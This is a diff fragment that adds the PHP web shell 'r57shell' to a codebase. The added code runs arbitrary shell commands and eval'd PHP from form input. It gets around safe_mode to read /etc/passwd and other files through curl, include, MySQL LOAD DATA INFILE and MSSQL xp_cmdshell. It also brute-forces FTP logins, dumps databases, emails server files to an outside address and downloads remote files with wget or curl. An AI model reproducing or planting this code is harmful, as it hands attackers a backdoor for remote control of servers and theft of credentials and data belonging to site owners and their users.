+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ 
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      } 
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+  {     
+  $connection = @ftp_connect($ftp_server,$ftp_port,10); 
+  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } 
+  @ftp_close($connection);
+  }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="db_show")
+ {
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mysql_query("SHOW DATABASES", $db);
+   while(($row=@mysql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
+     while(($row2=@mysql_fetch_row($res2))) 
+      {
+      echo " | - ".$row2[0]."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
+       while(($row3=@mysql_fetch_row($res3))) { echo "   | - ".$row3[0]."\r\n"; }
+       }
+      } 
+     }
+    }
+   @mysql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MySQL server";          
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mssql_query("sp_databases", $db);
+   while(($row=@mssql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     @mssql_select_db($row[0]);
+     $res2 = @mssql_query("sp_tables",$db);
+     while(($row2=@mssql_fetch_array($res2))) 
+      {
+      if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
+      {
+      echo " | - ".$row2['TABLE_NAME']."\r\n"; 
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mssql_query("sp_columns ".$row2[2],$db);
+       while(($row3=@mssql_fetch_array($res3))) { echo "   | - ".$row3['COLUMN_NAME']."\r\n"; }
+       }
+      }
+      } 
+     }
+    }
+   @mssql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+  $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
+   while(($row=@pg_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+    }   
+  @pg_close($db);
+  }
+ else echo "[-] ERROR! Can't connect to PostgreSQL server";     
+ break;
+ }
+ }
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $sqh  = "# homepage: http://rst.void.ru\r\n";
+  $sqh .= "# ---------------------------------\r\n";
+  $sqh .= "#     date : ".date ("j F Y g:i")."\r\n";
+  $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
+  $sqh .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+  $sqh .= "# ---------------------------------\r\n\r\n";
+  switch($_POST['db']){
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+     $sql2 = '';
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while (($row = @mysql_fetch_assoc($res))) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MySQL server";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+  {
+   if(@mssql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MSSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
+     if (@mssql_num_rows($res) > 0) {
+     while (($row = @mssql_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+    }
+   else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);   
+  }     
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+     $sql1  = "# PostgreSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
+     if (@pg_num_rows($res) > 0) {
+     while (($row = @pg_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+   @pg_close($db);      
+  }     
+  else echo "[-] ERROR! Can't connect to PostgreSQL server";
+  break;
+  } 
+ } 
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
+ } 
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function up_down($id)
+ {
+ global $lang;
+ global $language;
+ return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">';     
+ }
+function div($id)
+ { 
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';       
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on) $select .= '<option>PostgreSQL</option>';
+if($ora_on) $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text77']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
